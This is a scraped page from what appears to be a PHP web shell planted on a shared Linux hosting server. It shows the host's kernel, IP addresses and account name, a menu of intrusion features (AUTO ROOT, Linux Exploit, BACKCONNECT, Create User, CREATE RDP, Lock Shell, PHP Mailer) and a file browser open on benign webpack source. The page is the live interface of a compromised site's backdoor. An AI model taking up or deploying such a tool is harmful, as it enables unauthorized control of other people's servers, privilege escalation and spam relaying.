Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.171
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
nodejs /
webpack /
lib /
performance /
[ HOME SHELL ]
Name
Size
Permission
Action
AssetsOverSizeLimitWarning.js
837
B
-rw-r--r--
EntrypointsOverSizeLimitWarnin...
968
B
-rw-r--r--
NoAsyncChunksWarning.js
611
B
-rw-r--r--
SizeLimitsPlugin.js
3.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : EntrypointsOverSizeLimitWarning.js
/* MIT License http://www.opensource.org/licenses/mit-license.php Author Sean Larkin @thelarkinn */ "use strict"; const WebpackError = require("../WebpackError"); const SizeFormatHelpers = require("../SizeFormatHelpers"); module.exports = class EntrypointsOverSizeLimitWarning extends WebpackError { constructor(entrypoints, entrypointLimit) { const entrypointList = entrypoints .map( entrypoint => `\n ${entrypoint.name} (${SizeFormatHelpers.formatSize( entrypoint.size )})\n${entrypoint.files.map(asset => ` ${asset}`).join("\n")}` ) .join(""); super(`entrypoint size limit: The following entrypoint(s) combined asset size exceeds the recommended limit (${SizeFormatHelpers.formatSize( entrypointLimit )}). This can impact web performance. Entrypoints:${entrypointList}\n`); this.name = "EntrypointsOverSizeLimitWarning"; this.entrypoints = entrypoints; Error.captureStackTrace(this, this.constructor); } };
Close